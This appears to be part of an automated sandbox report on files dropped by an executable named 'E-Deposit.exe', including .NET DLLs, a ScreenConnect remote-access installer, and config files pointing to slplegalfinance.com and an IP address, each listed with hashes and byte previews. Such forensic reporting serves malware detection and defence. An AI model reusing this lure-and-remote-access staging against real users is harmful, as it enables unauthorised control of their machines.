                                                                                      SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):36864
                                                                                      Entropy (8bit):4.340550904466943
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                      MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                      SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                      SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                      SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):57344
                                                                                      Entropy (8bit):4.657268358041957
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                      MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                      SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                      SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                      SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):5.775360792482692
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                      MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                      SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                      SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                      SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):548864
                                                                                      Entropy (8bit):6.034211651049746
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                      MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                      SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                      SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                      SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.273875899788767
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                      MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                      SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                      SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                      SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1721856
                                                                                      Entropy (8bit):6.639085961200334
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                      MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                      SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                      SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                      SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                      Process:C:\Users\user\Desktop\E-Deposit.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                      Category:dropped
                                                                                      Size (bytes):13369344
                                                                                      Entropy (8bit):7.966971359391998
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                      MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                      SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                      SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                      SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                      Malicious:false
                                                                                      Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                      Category:dropped
                                                                                      Size (bytes):13369344
                                                                                      Entropy (8bit):7.966971359391998
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                      MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                      SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                      SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                      SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                      Malicious:false
                                                                                      Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                      Category:dropped
                                                                                      Size (bytes):13369344
                                                                                      Entropy (8bit):7.966971359391998
                                                                                      Encrypted:false
                                                                                      SSDEEP:196608:1Wh0cGwKWh0cGEWh0cGrWh0cGAWh0cGwWh0cGJWh0cG7:1WacMWactWacYWaczWacRWacaWacW
                                                                                      MD5:DBA166C47F82656C2399F7223DE2DB3F
                                                                                      SHA1:9CF89A17AEF41E2C3BDE3761E1769B2831609FDF
                                                                                      SHA-256:20E07D53E0F53958D613CB374F001EBDBFF95ED2D96F2F46BCA286D408662B44
                                                                                      SHA-512:B19E49CE816783F04AADF28AB02E0692383C5A5A706AB9C6E7A7329023F5596915FC26B88B1C72C4D68E934F0DA61DF99DCFE0CCE166F62544E6D5245939215C
                                                                                      Malicious:false
                                                                                      Preview:......................>.......................................................{...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):423885
                                                                                      Entropy (8bit):6.577044664316522
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:guH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv+:guH2anwohwQUv5uH2anwohwQUv+
                                                                                      MD5:F75FC1827CB9A0E5A3672945BB2395F2
                                                                                      SHA1:9F8198BBC0FEAAB0E49F37595AC6574CAE764605
                                                                                      SHA-256:DCB2F55C144018C8EEC7E968AE27FF77C0B0362CDCB4C61BA35C04375FD9BCF3
                                                                                      SHA-512:421A8DAC85A26985BE9153340A1829EFCEF5F135310E96795BB96C551AA9B1FB335DFB34DF53734D6C0F5BDB4423153A6AE7688C86CC1D4F0E619DD04657088B
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI89D0.tmp, Author: Joe Security
                                                                                      Preview:...@IXOS.@.....@.,&Z.@.....@.....@.....@.....@.....@......&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}'.ScreenConnect Client (484f9eed1d8e13b9)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (484f9eed1d8e13b9)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E29000A5-D988-BF34-ACFB-64A448AB1544}^.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5D9AA345-F8BD-8991-FE6D-9CD87DEF2A88}f.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{12B3F4C9-0930-DE85-D0AC-49BFF78FE3DC}c.C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileMa
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):207360
                                                                                      Entropy (8bit):6.573348437503042
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                      MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                      SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                      SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                      SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):207360
                                                                                      Entropy (8bit):6.573348437503042
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                      MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                      SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                      SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                      SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.1727496023106816
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:JSbX72FjFAGiLIlHVRpIh/7777777777777777777777777vDHFUVPV7rl0i8Q:JPQI5wiV0F
                                                                                      MD5:AD2D7494FCE7709B8FBB43838D03A40E
                                                                                      SHA1:C839B75888FF7ED5C185389CF8DAF619B5FCF642
                                                                                      SHA-256:CD2E1C4174B5EDF0BD9FADB8374FBBB11E5248E01E51A497261AE429D1BC11C9
                                                                                      SHA-512:10D53647F9861050088F7E33AA397CF1CE1C5CD5AC126D263995FA915465443863D8820C2C652185BC7C63AFC3091EFECD16E04973336E0433E7E7B80B51D3D4
                                                                                      Malicious:false
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):1.802197094823399
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:T8PhVuRc06WXzIjT5ni79xK0qcq56Adum1Si5zjCiZdSAYxXV3jzoXrmAdum1SIO:6hV1tjTgzEph1fd1ZdAxJu1R
                                                                                      MD5:3DFC039B312A5D248A6C254150205776
                                                                                      SHA1:F02464F1F94B52C5082AAC69FAD7721EE44ACB4E
                                                                                      SHA-256:77A8952D92E3590146AF33A3797BC3A21E42DF1879B29EAF9371A67F2E853CAE
                                                                                      SHA-512:0C6BF4A5C31BD7103B6F0A5FF939356F008DF4F15148346F0DB92BD154EB23075E2C4D0E1B9DD80F7FB57BBD61E41E9836FF6FBA6A50FFFE8F81A3164B5F398F
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                      Category:dropped
                                                                                      Size (bytes):435
                                                                                      Entropy (8bit):5.289734780210945
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                      MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                      SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                      SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                      SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                      Malicious:false
                                                                                      Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):364484
                                                                                      Entropy (8bit):5.3654975409528065
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpEE
                                                                                      MD5:A91B68CE97AF4B4AD6E7A4CC3BF3B10B
                                                                                      SHA1:FF402A8B0A370B47A16D1397DE79798FCDB9CE87
                                                                                      SHA-256:8E13E9259BF42C7A61DA0FB2100F6BEA54BE62D135A3CCAB96B5CEE2B1B59A2D
                                                                                      SHA-512:9F1F5A408D15213EAF9D15DEE2141CD409D049EEA1DC8DD04240F7DA836E543C306CA1543D283CF75CA1B8604829058C71E3B0A79EBD01D9D6A7DC3DB5692C05
                                                                                      Malicious:false
                                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.036580303973881
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLV+/vXbAa3xT:2dL9hK6E46YPaDEVkvH
                                                                                      MD5:14B39EB8B42646C533345EB079B91AF1
                                                                                      SHA1:0CF9EC543E5FAD2512D604B6C4EFD94483DD8F6E
                                                                                      SHA-256:695E14D268B898289735DB0AF0BE9619953AC7DEDEE14F0B901EDDAF46B5B0BC
                                                                                      SHA-512:EFD4544D97EA068580E33D6E3C913ACA0E28A9F08681B5EBCF5A6CA1C19C86C0B7D6BB7AD0D529D36712C3C532285314898E9E81E49F1FC14457127EC76F3FB3
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a38%3a39</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.037737586716025
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLL/vXbAa3xT:2dL9hK6E46YPaDETvH
                                                                                      MD5:6AAA15C561CC4ABEE0DD7156117D34BB
                                                                                      SHA1:88BF14147E2779916C055CB1ABA6104237093987
                                                                                      SHA-256:8B79A93E1AD2965A0E02B7C00A3BEE8326E0F80D4CB003B3E2C2A4C478C7A6EF
                                                                                      SHA-512:7346078EBA8EA8E4639418540A749FD8B6726CF50F1DEC79CECED12945EF671E6F5E015FDD5249120928827CA32C7C1975A0C88DFA0E0AF67E8BC5705633A48E
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a39%3a48</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                      Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):566
                                                                                      Entropy (8bit):5.032533494688628
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLf/vXbAa3xT:2dL9hK6E46YPaDEnvH
                                                                                      MD5:921646580404CB989DBF2790769FD7FA
                                                                                      SHA1:0D95E38A09250042235116B57A21428302EFF8B4
                                                                                      SHA-256:D8050577618574457401E78B8CB8FA4AD91E4FF4AA8F583DE9C6BBC52E805FC3
                                                                                      SHA-512:EC1A96AEAD60E49D6E06DD3989B50AB4AF08BFFFBDBBB69E9DFCF0165262B5181BEE0EFE265D38A1E1DC32F59B74E8D68D5583513DFFD1B4A601C273F7C29F8A
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a39%3a00</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
